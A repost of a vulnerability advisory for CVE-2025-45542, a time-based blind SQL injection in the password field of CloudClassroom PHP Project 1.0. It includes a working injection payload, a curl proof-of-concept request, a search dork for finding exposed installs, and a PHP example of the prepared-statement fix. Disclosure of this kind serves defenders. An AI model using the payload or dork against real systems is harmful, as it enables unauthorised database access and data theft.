CloudClassroom PHP Project 1.0 SQL Injection
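CloudClassroom PHP Project 1.0 has a time-based blind SQL injection vulnerability affecting the `pass` parameter of the `registrationform` endpoint. An attacker can exploit it to execute malicious SQL code, leading to sensitive information disclosure or authentication bypass. Fixing it with prepared statements and input filtering is recommended.
2025-6-4 09:0:36 Author: cxsecurity.com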


Hello Full Disclosure list,

I am sharing details of a newly assigned CVE affecting an open-source educational software project:

------------------------------------------------------------------------
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0
------------------------------------------------------------------------

Product: CloudClassroom PHP Project
Vendor: https://github.com/mathurvishal/CloudClassroom-PHP-Project
Affected Version: v1.0
Vulnerability Type: SQL Injection
Attack Type: Remote
CVE ID: CVE-2025-45542
Discoverer: Sanjay Singh

Vulnerability Details:
A time-based blind SQL injection vulnerability exists in the `registrationform` endpoint of CloudClassroom-PHP-Project v1.0. The `pass` parameter is not properly sanitized, allowing an unauthenticated remote attacker to manipulate backend SQL logic and potentially extract sensitive information.

Proof of Concept:
The vulnerability can be exploited using a POST request with a crafted payload like:
`'XOR(if(now()=sysdate(),sleep(6),0))XOR'`

Impact:
Successful exploitation allows for:
- Arbitrary SQL execution
- Potential information disclosure
- Authentication bypass under certain conditions

Recommended Mitigations:
- Use prepared statements with parameterized queries
- Sanitize input with `mysqli_real_escape_string()` or similar
- Implement a Web Application Firewall (WAF)
- Enforce least privilege on the application’s DB user

References:
- GitHub: https://github.com/mathurvishal/CloudClassroom-PHP-Project
- Exploit-DB Submission (pending approval)
- GHDB Dork (submitted): `inurl:"CloudClassroom-PHP-Project-master" intitle:"Cloud Classroom"`

I have also submitted this to Exploit-DB and the Google Hacking Database to assist defenders and researchers.

Attached is a detailed advisory in plain text format.
Regards,
Sanjay Singh
https://www.linkedin.com/in/sanjay70023
https://gist.github.com/sanjay70023/63e9c32e49a0760eaa6b9e2a8ba8c966

--- packet storm appended exploit below ---

# Exploit Title: CloudClassroom PHP Project v1.0 - Time-Based Blind SQL Injection (pass parameter)
# Google Dork: inurl:CloudClassroom-PHP-Project-master
# Date: 2025-05-30
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
# Version: 1.0
# Tested on: XAMPP on Windows 10 / Ubuntu 22.04
# CVE : CVE-2025-45542

# Description:
# A time-based blind SQL injection vulnerability exists in the pass parameter
# of the registrationform endpoint. An attacker can exploit this issue by sending
# a malicious POST request to delay server response and infer data.

# PoC Request (simulated using curl):

curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&[email protected]&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="

# The server response will be delayed if the SQL condition is true, confirming the injection point.
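
The first recommended mitigation above (prepared statements with parameterized queries), as an added example that is not from the advisory or the CloudClassroom project. The table name `student`, its columns, both function names, and the use of PDO with in-memory SQLite in place of the project's MySQL database are assumptions; password hashing is an addition beyond the advisory's list.

```php
<?php
declare(strict_types=1);

// Added example, not CloudClassroom code. The table "student" and its columns
// are assumptions; in-memory SQLite stands in for the project's MySQL database.

/** Vulnerable pattern: the raw value is spliced into the SQL text. */
function buildConcatenatedSql(string $email, string $pass): string
{
    return "INSERT INTO student (email, pass) VALUES ('$email', '$pass')";
}

/** Hardened pattern: fixed SQL text, values bound separately, password hashed. */
function registerStudent(PDO $db, string $email, string $pass): void
{
    $stmt = $db->prepare('INSERT INTO student (email, pass) VALUES (:email, :pass)');
    $stmt->execute([
        ':email' => $email,
        ':pass'  => password_hash($pass, PASSWORD_DEFAULT),
    ]);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE student (email TEXT PRIMARY KEY, pass TEXT NOT NULL)');

// The pass value from the advisory's PoC request, used here as test input.
$pass  = "u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z";
$email = 'student@example.test'; // constructed sample value

// Concatenation: the quote inside $pass closes the string literal, so the
// XOR(...) expression becomes part of the statement the database parses.
echo buildConcatenatedSql($email, $pass), PHP_EOL;

// Bound parameter: the same bytes reach the database only as data.
registerStudent($db, $email, $pass);
$row = $db->query('SELECT pass FROM student')->fetch(PDO::FETCH_ASSOC);

// The stored hash verifies against the exact submitted string, and exactly
// one row exists: no part of the input was interpreted as SQL.
var_dump(password_verify($pass, $row['pass']));
var_dump((int) $db->query('SELECT COUNT(*) FROM student')->fetchColumn());
```

With mysqli, the equivalent is `prepare()` with `?` placeholders followed by `bind_param()` and `execute()`.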



 



Source: https://cxsecurity.com/issue/WLB-2025060004